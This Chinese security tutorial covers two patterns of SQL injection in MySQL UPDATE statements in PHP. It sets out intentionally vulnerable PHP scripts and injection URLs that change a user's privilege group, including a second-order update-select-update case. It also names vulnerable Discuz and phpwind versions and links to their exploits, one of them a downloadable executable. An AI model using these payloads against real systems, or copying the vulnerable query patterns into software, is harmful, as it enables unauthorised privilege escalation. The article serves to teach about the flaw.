当前位置:首页 > UPDATE注射(mysql+php)的两个模式

UPDATE注射(mysql+php)的两个模式

点击次数:1494  更新日期:2011-01-03
\n

一.测试环境:

  OS: Windowsxp sp2

  php: php 4.3.10 (

  mysql 4.1.9

  apache 1.3.33

  二.测试数据库结构:
\n


\n

\n


\n
—–start—

– 数据库: test



– ——————————————————–



– 表的结构 userinfo



CREATE TABLE userinfo (

groudid varchar(12) NOT NULL default ’1’,

user varchar(12) NOT NULL default ’heige’,

pass varchar(122) NOT NULL default ’123456’

) ENGINE=MyISAM DEFAULT CHARSET=latin1;



– 导出表中的数据 userinfo



INSERT INTO userinfo VALUES (’2’, ’heige’, ’123456’);

——end——-

三.测试模式:

  1,变量没有带’’或”"[MOD1]


\n

\n


\n
<?php 

//test1.php Mod1

servername = “localhost”;

dbusername = “root”;

dbpassword = “”;

dbname = “test”;

mysql_connect(servername,dbusername,dbpassword) or die (“数据库连接失败”);

sql = “update userinfo set pass=p where user=’heige’”;//<–P没有使用单引号

result = mysql_db_query(dbname, sql);

userinfo = mysql_fetch_array(result);

echo “

SQL Query:sql

“;

?>



  脚本里只是修改user=’heige’的pass,如果groudid表示用户的权限等级,我们的目的就是通过构造p 来达

  到修改groupid的目的:

  那么我们提交:http://127.0.0.1/test1.php?p=123456,groudid=1

  在mysql里查询:
\n

\n


\n
mysql> select * from userinfo;

+———+——-+——–+

| groudid | user | pass |

+———+——-+——–+

| 1 | heige | 123456 |

+———+——-+——–+

1 row in set (0.01 sec)

\n

用户heige的groudid又2改为1了 \':)\'

  所以我们可以得到没有’’或”" update的注射是可以成功的,这个就是我们的模式1。

  2,变量带’’或”"[MOD2]


\n


\n

\n


\n
<?php

//test2.php

servername = “localhost”;

dbusername = “root”;

dbpassword = “”;

dbname = “test”;

mysql_connect(servername,dbusername,dbpassword) or die (“数据库连接失败”);

sql = “update userinfo set pass=’p’ where user=’heige’”;//<–P使用单引号

result = mysql_db_query(dbname, sql);

userinfo = mysql_fetch_array(result);

echo ”
\n

SQL Query:sql
\n

“;

?>


\n

  为了关闭’我们构造p应该为123456’,groudid=’2 提交:

  http://127.0.0.1/test2.php?p=123456’,groudid=’1 在gpc=on的情况下’变成了\\’

  提交的语句变成:SQL Query:update userinfo set pass=’123456\\’,groudid=\\’1’ where user=’heige’


\n

mysql查询:
\n

\n


\n
mysql> select * from userinfo;

+———+——-+——————–+

| groudid | user | pass |

+———+——-+——————–+

| 2 | heige | 123456’,groudid=’1 |

+———+——-+——————–+

1 row in set (0.00 sec)


  groudid并没有被修改。那么在变量被’’或”"时 就完全没有被注射呢?不是 下面我们看模式2:
\n

\n


\n
<?php

//test3.php Mod2

servername = “localhost”;

dbusername = “root”;

dbpassword = “”;

dbname = “test”;

mysql_connect(servername,dbusername,dbpassword) or die (“数据库连接失败”);

sql = “update userinfo set pass=’p’ where user=’heige’”;//<–P使用单引号

result = mysql_db_query(dbname, sql);

mysql_fetch_array(result); //p的数据写入数据库

sql= “select pass from userinfo where user=’heige’”;

result = mysql_db_query(dbname, sql);

userinfo=mysql_fetch_array(result);

echo userinfo[0]; //把pass查询输出给userinfo[0]

sql =”update userinfo set pass=’userinfo[0]’ where user=’heige’”;

result = mysql_db_query(dbname, sql);

mysql_fetch_array(result); //把userinfo[0] 再次update

?>


\n

我们测试下,提交:http://127.0.0.1/test3.php?p=123456’,groudid=’1

  回mysql查询下 :
\n

\n


\n
mysql> select * from userinfo;

+———+——-+——–+

| groudid | user | pass |

+———+——-+——–+

| 1 | heige | 123456 |

+———+——-+——–+

1 row in set (0.00 sec)


  HaHa~~ 成功注射 修改groudid为1。 这个就是我们的模式2了,简单的描叙如下:

  update–>select–>update

  四.实际模式

  模式1:Discuz 2.0/2.2 register.php 注射

  漏洞分析:http://4ngel.net/article/41.htm

  Discuz 2.0/2.2 register.php Remote Exploit :http://4ngel.net/project/discuz_reg.htm

  模式2:phpwind 2.0.2和3.31e 权限提升漏洞


\n


\n

\n


\n
漏洞分析:

update (profile.php 注射变量为proicon update语句里为,icon=’userdb[icon]’)

|

v

select (jop.php)

|

v

updtate (jop.php)



Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe


  五.鸣谢

  特别感谢saiy等朋友的讨论和帮助。Thanks!!!


\n
作者:安全天使·SuperHei 来源:黑基

\n